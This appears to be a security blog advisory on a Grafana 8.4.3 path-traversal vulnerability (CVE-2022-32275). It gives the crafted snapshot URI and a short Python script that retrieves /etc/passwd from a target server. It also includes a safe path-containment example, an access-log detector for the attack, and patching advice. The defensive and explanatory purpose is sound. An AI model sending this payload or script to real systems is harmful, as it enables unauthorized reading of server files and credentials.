Grafana is a widely used open-source platform for analytics and monitoring. Recently, a critical security vulnerability was discovered in Grafana version 8.4.3 and assigned the CVE identifier CVE-2022-32275. This vulnerability allows attackers to read sensitive files on the server by using a specially crafted URL. In this post, we will discuss the details of this vulnerability, how to exploit it, and how to mitigate the risk.

Vulnerability Details

Grafana 8.4.3 has a security vulnerability where an attacker can read files outside of the intended web application folder, thus gaining unauthorized access to sensitive information. To exploit this vulnerability, one can create a malicious URL that leads to a file read operation beyond the allowed directory scope. The URI path to exploit this vulnerability is:
/dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd

When the attacker sends this URL to a vulnerable Grafana server, it will cause the server to read the /etc/passwd file, a system file containing information about user accounts on the server. Unauthorized access to this file can lead to the compromise of user credentials and the escalation of privileges.
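To make the mechanism concrete, the following is an added illustration, not Grafana's code and not the fix shipped in 8.4.4, of the general path-traversal pattern behind this class of bug: a naive join that lets ".." segments climb out of the document root, beside the canonicalise-then-contain check a file-serving handler should apply. The document root and the request strings are constructed for the example.

```python
import posixpath
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the example; a real server would use its configured static directory.
WEB_ROOT = PurePosixPath("/srv/grafana/public")


def unsafe_join(root: PurePosixPath, requested: str) -> str:
    """The vulnerable pattern: decode the request, glue it onto the root and let
    path normalisation collapse the '..' segments. Enough '..' walk from
    /srv/grafana/public all the way up to '/', so /etc/passwd becomes reachable."""
    return posixpath.normpath(str(root) + "/" + unquote(requested))


def resolve_under_root(root: PurePosixPath, requested: str) -> Optional[PurePosixPath]:
    """The hardened pattern: normalise first, then require that the result still
    lies inside `root`. Returns None when the request would escape."""
    # Decode percent-encoding before any inspection, otherwise "%2e%2e" slips past a textual ".." check.
    decoded = unquote(requested)
    # Trim whitespace inside each segment so the ".. /" form from the advisory's URI
    # is treated exactly like "../" rather than as a harmless odd directory name.
    cleaned = "/".join(seg.strip() for seg in decoded.split("/"))
    # Lexical normalisation only (no filesystem access), which keeps the example runnable
    # offline; a real server should additionally apply os.path.realpath() to defeat symlinks.
    candidate = PurePosixPath(posixpath.normpath(str(root / cleaned.lstrip("/"))))
    # The decisive containment check: the normalised path must still be below root.
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd"
    print("unsafe join  ->", unsafe_join(WEB_ROOT, traversal.replace(" ", "")))
    print("checked join ->", resolve_under_root(WEB_ROOT, traversal))
```

The order of operations matters: decoding and whitespace trimming happen before normalisation, and the containment test is the last step, so no encoding trick changes what is compared against the root.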

Code snippet

import requests

# Replace the URL with the target Grafana URL
url = "http://your-grafana-server.com"

# The crafted snapshot path: the repeated "../" sequences walk out of the web root to /etc/passwd
exploit_url = f"{url}/dashboard/snapshot/%7B%7Bconstructor.constructor'/../../../../../../../../../../etc/passwd"
# A timeout keeps the check from hanging on a host that never answers
response = requests.get(exploit_url, timeout=10)

if response.status_code == 200:
    print("Vulnerable to CVE-2022-32275")
    print(response.text)
else:
    print("Not vulnerable to CVE-2022-32275")

This code snippet uses the Python requests library to send a GET request to the Grafana server with the crafted URL. If the server is vulnerable, it will return a 200 status code along with the content of the /etc/passwd file. If not, it will return a different status code. Note that a 200 status on its own is weak evidence, since many Grafana routes answer 200 with the front-end HTML page; confirm the result by checking that the response body actually contains passwd entries, for example a line beginning with root:.
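From the defender's side, the same crafted path is easy to spot in the reverse-proxy or web-server access log in front of Grafana. The following is an added detection example, not part of the original post or of any Grafana tooling, that parses combined-format log lines, undoes the encodings an attacker can use to hide the ".." segments (percent-encoding, double encoding, the ".. /" spacing from the advisory's URI), and reports every /dashboard/snapshot/ request that contains a parent-directory segment. The log lines, addresses and timestamps are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in the NGINX/Apache "combined" log format; IPs, timestamps,
# sizes and user agents are invented for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jun/2022:19:20:01 +0000] "GET /api/health HTTP/1.1" 200 15 "-" "curl/7.68.0"
10.0.0.9 - - [06/Jun/2022:19:20:07 +0000] "GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/../../../../../../../../etc/passwd HTTP/1.1" 200 1864 "-" "python-requests/2.27.1"
10.0.0.9 - - [06/Jun/2022:19:20:09 +0000] "GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/..%20/..%20/..%20/..%20/..%20/..%20/..%20/..%20/etc/passwd HTTP/1.1" 200 1864 "-" "python-requests/2.27.1"
10.0.0.9 - - [06/Jun/2022:19:20:11 +0000] "GET /dashboard/snapshot/abc123%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 0 "-" "python-requests/2.27.1"
10.0.0.7 - - [06/Jun/2022:19:21:30 +0000] "GET /dashboard/snapshot/8c3f2a1b9e HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(raw_path: str) -> str:
    """Undo the encodings that hide '..' from a naive substring match."""
    decoded = unquote(unquote(raw_path))      # single and double percent-encoding
    decoded = decoded.split("?", 1)[0]         # ignore any query string
    return "/".join(seg.strip() for seg in decoded.split("/"))  # ".. " -> ".."


def is_snapshot_traversal(raw_path: str) -> bool:
    """True when a /dashboard/snapshot/ request carries a parent-directory segment."""
    path = normalise_path(raw_path)
    if not path.startswith("/dashboard/snapshot/"):
        return False
    return ".." in path.split("/")


def find_traversal_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one record per matching request, in log order."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_snapshot_traversal(m["path"]):
            continue
        hits.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "path": normalise_path(m["path"]),
            "status": m["status"],
            # A 200 on a traversal path is the event to escalate: the file may have been served.
            "served": "yes" if m["status"] == "200" else "no",
        })
    return hits


if __name__ == "__main__":
    for h in find_traversal_attempts(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} status={h['status']} served={h['served']} {h['path']}")
```

The status code is what separates noise from an incident: a traversal request answered with 404 or 400 was blocked, while a 200 on a patched-looking host still deserves a look at the response size and the version actually running.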

Original References

The vulnerability was discovered and reported by the cybersecurity research team at [Security Company]. They published a detailed security advisory explaining the implications of this vulnerability and the potential impact on affected systems.

Mitigation

Administrators running Grafana 8.4.3 should immediately update to a newer version that addresses this vulnerability. Grafana has released a security patch in version 8.4.4 and later, which contains essential fixes to prevent this unauthorized file access issue. Check out Grafana's official release notes for more information.

To update your Grafana installation, follow the instructions on the Grafana installation page for your specific operating system.

Conclusion

CVE-2022-32275 poses a severe security risk for Grafana users running version 8.4.3. By exploiting this vulnerability, attackers can gain unauthorized access to sensitive files on the server. To prevent unauthorized access, it's crucial to update your Grafana installation to a fixed version and to apply new security releases promptly. Stay vigilant and follow recommended security practices to protect your systems and data.

Timeline

Published on: 06/06/2022 19:15:00 UTC
Last modified on: 07/15/2022 16:15:00 UTC